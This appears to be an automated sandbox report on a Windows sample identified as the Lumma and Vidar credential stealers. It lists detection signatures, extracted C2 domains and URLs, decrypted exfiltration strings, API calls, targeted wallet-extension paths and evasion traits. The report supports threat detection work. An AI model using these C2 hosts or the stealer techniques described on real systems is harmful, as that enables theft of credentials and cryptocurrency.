Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1525478
MD5: 2ab4c1827edd0f4dc810cf0f9b3bd30d
SHA1: a32347945672d6c1b7bd275f2d62b62d9749bebb
SHA256: c7a9b126d27a142ad49c3b46591716348393efae2bf563df648701827bd7f80c
Tags: exeuser-Bitsight

Detection

LummaC, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Vidar stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Country aware sample found (crashes after keyboard check)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: https://steamcommunity.com/profiles/76561199724331900 URL Reputation: Label: malware
Source: https://steamcommunity.com/profiles/76561199724331900/inventory/ URL Reputation: Label: malware
Source: 00000001.00000002.2478563220.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "566ac7bdeaf763bbaf70aa6d5667c804"}
Source: 8.2.GCGHCBKFCF.exe.300000.0.unpack Malware Configuration Extractor: LummaC {"C2 url": ["soldiefieop.site", "chorusarorp.site", "absorptioniw.site", "questionsmw.stor", "treatynreit.site", "abnomalrkmu.site", "mysterisop.site", "snarlypagowo.site"], "Build id": "H8NgCl--"}
Source: playd.healthnlife.pk Virustotal: Detection: 8%
Source: cowod.hopto.org Virustotal: Detection: 9%
Source: questionsmw.store Virustotal: Detection: 16%
Source: soldiefieop.site Virustotal: Detection: 15%
Source: http://cowod.hopto.org Virustotal: Detection: 9%
Source: https://beearvagueo.site/; Virustotal: Detection: 9%
Source: file.exe ReversingLabs: Detection: 39%
Source: file.exe Virustotal: Detection: 30%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\ProgramData\GCGHCBKFCF.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\a43486128347[1].exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: absorptioniw.site
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: mysterisop.site
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: snarlypagowo.site
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: treatynreit.site
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: chorusarorp.site
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: abnomalrkmu.site
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: soldiefieop.site
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: questionsmw.stor
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: soldiefieop.site
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: TeslaBrowser/5.5
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: - Screen Resoluton:
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: - Physical Installed Memory:
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: Workgroup: -
Source: 00000009.00000002.2169339520.0000000000400000.00000040.00000400.00020000.00000000.sdmp String decryptor: H8NgCl--
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree, 1_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 1_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA, 1_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA, 1_2_0040A7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CAB6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 1_2_6CAB6C80
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:57016 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.93.202:443 -> 192.168.2.4:57019 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:57021 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:57213 version: TLS 1.2
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: MSBuild.exe, 00000001.00000002.2509880693.000000006CB1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: freebl3.pdb source: MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: freebl3.pdbp source: MSBuild.exe, 00000001.00000002.2490322260.000000001E0FA000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.1.dr, freebl3[1].dll.1.dr
Source: Binary string: nss3.pdb@ source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: softokn3.pdb@ source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: MSBuild.exe, 00000001.00000002.2500700972.0000000035EBC000.00000004.00000020.00020000.00000000.sdmp, vcruntime140[1].dll.1.dr, vcruntime140.dll.1.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: MSBuild.exe, 00000001.00000002.2495526270.0000000029FDE000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.1.dr, msvcp140[1].dll.1.dr
Source: Binary string: nss3.pdb source: MSBuild.exe, 00000001.00000002.2503544477.000000003BE2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2510854270.000000006CCDF000.00000002.00000001.01000000.00000008.sdmp, nss3.dll.1.dr, nss3[1].dll.1.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: MSBuild.exe, 00000001.00000002.2486359775.0000000017E2A000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.2489960212.000000001DD98000.00000002.00001000.00020000.00000000.sdmp, sql[1].dll.1.dr
Source: Binary string: mozglue.pdb source: MSBuild.exe, 00000001.00000002.2509880693.000000006CB1D000.00000002.00000001.01000000.00000009.sdmp, MSBuild.exe, 00000001.00000002.2492771809.000000002406D000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.1.dr, mozglue[1].dll.1.dr
Source: Binary string: softokn3.pdb source: MSBuild.exe, 00000001.00000002.2498209531.000000002FF49000.00000004.00000020.00020000.00000000.sdmp, softokn3[1].dll.1.dr, softokn3.dll.1.dr
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_005C73FF FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_005C73FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 1_2_0041543D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose, 1_2_00414CC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 1_2_0040B5DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00401D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 1_2_0040BF4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_00415FD1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 1_2_0040B93F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 1_2_00415B0B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 1_2_0040CD37
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 8_2_003173FF FindFirstFileExW,FindNextFileW,FindClose,FindClose, 8_2_003173FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 1_2_00415142
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 0_2_005D9385
Source: C:\Users\user\Desktop\file.exe Code function: 4x nop then mov dword ptr [ebp-04h], eax 0_2_005D9385
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov eax, dword ptr fs:[00000030h] 1_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4x nop then mov dword ptr [ebp-04h], eax 1_2_004014AD
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0035A004
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0035A08D
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then movzx esi, byte ptr [edx+eax-01h] 8_2_003340E8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then movzx edx, word ptr [esp+eax*4+000000ACh] 8_2_003340E8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 8_2_0033C16C
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov word ptr [edx], ax 8_2_00352158
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+20h] 8_2_0033E1F1
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0035A3E0
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 8_2_0033E448
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0035A3D9
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then movzx ecx, word ptr [edi] 8_2_003524F8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov ebx, eax 8_2_00332558
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov ebp, eax 8_2_00332558
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp al, 2Eh 8_2_003546B7
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+14h] 8_2_003526A8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then jmp eax 8_2_00352778
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_003549E3
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then movzx edx, byte ptr [esi+edi] 8_2_0032CA28
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0035AA72
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 8_2_0036EABD
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 8_2_0036EB32
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F3285E74h 8_2_0036CB68
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then jmp dword ptr [00451A70h] 8_2_00356C40
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h 8_2_00348C49
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esi+08h] 8_2_0033AD3A
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00356D18
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then movzx eax, byte ptr [ebx+edx-06h] 8_2_0032ED08
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then movzx esi, byte ptr [edx+ebp] 8_2_0032ED08
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+24h] 8_2_00354E06
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esi+00000080h] 8_2_0033AE05
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0035AE60
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0035AE60
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_0035AE60
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [edi], al 8_2_0035AE60
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov dword ptr [esp], 00000000h 8_2_00342ED8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h 8_2_0034EEC8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov word ptr [eax], dx 8_2_00348FA8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov esi, ebx 8_2_00370F90
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_0033B034
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00351018
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [ebp-14h] 8_2_0036D063
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h 8_2_003470AE
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_0034F128
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov word ptr [eax], cx 8_2_0034F128
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov dword ptr [esp+34h], edx 8_2_003291CA
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 8_2_0033D225
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 8_2_0033D215
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov dword ptr [esp+08h], ecx 8_2_0032925D
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+00000688h] 8_2_003452C4
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then dec ebx 8_2_003672C8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], D518DBA1h 8_2_003673B8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], D1A85EEEh 8_2_003673B8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_003553BA
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov dword ptr [esp+18h], 3602043Ah 8_2_003573A0
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov dword ptr [esp+50h], 00000000h 8_2_0033D394
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov word ptr [eax], dx 8_2_003493D1
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], 7789B0CBh 8_2_0036F508
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then movzx eax, word ptr [esi+ecx] 8_2_00369578
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+000000D0h] 8_2_0034560A
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+68h] 8_2_0036F6F8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [ebp-000000C0h] 8_2_003377EF
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+24h] 8_2_003558E2
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 8_2_003718E8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then movzx ebx, byte ptr [edx] 8_2_003638C8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 62429966h 8_2_0036BA38
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp byte ptr [ebp+ebx+00h], 00000000h 8_2_00355A23
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 53F09CFAh 8_2_00371A78
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then jmp dword ptr [0045042Ch] 8_2_00347A4B
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+54h] 8_2_00347A89
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_0035BAD6
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_0035BAD6
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_0035BAD6
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov byte ptr [ebx], al 8_2_0035BAD6
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then movzx edx, byte ptr [esi+ebx] 8_2_0032DAD8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_00337AD8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 8_2_00353B2E
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+08h] 8_2_0033BBF4
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp word ptr [ecx+edx+02h], 0000h 8_2_00371BF8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 9ECF05EBh 8_2_00371BF8
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_0036BC78
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp eax, C0000004h 8_2_00345CD6
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then xor eax, eax 8_2_00353DCE
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then jmp eax 8_2_0033DE12
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [esi+edx*8], 69F07BF2h 8_2_0034FE00
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_00335E98
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov eax, dword ptr [esp+10h] 8_2_00335E98
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [ebx+edx*8], 64567875h 8_2_0036BF18
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then cmp dword ptr [edi+edx*8], F3285E74h 8_2_0036FF78
Source: C:\ProgramData\GCGHCBKFCF.exe Code function: 4x nop then mov ebx, dword ptr [edi+04h] 8_2_00357F88

Networking

Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:49745 -> 141.98.233.156:80
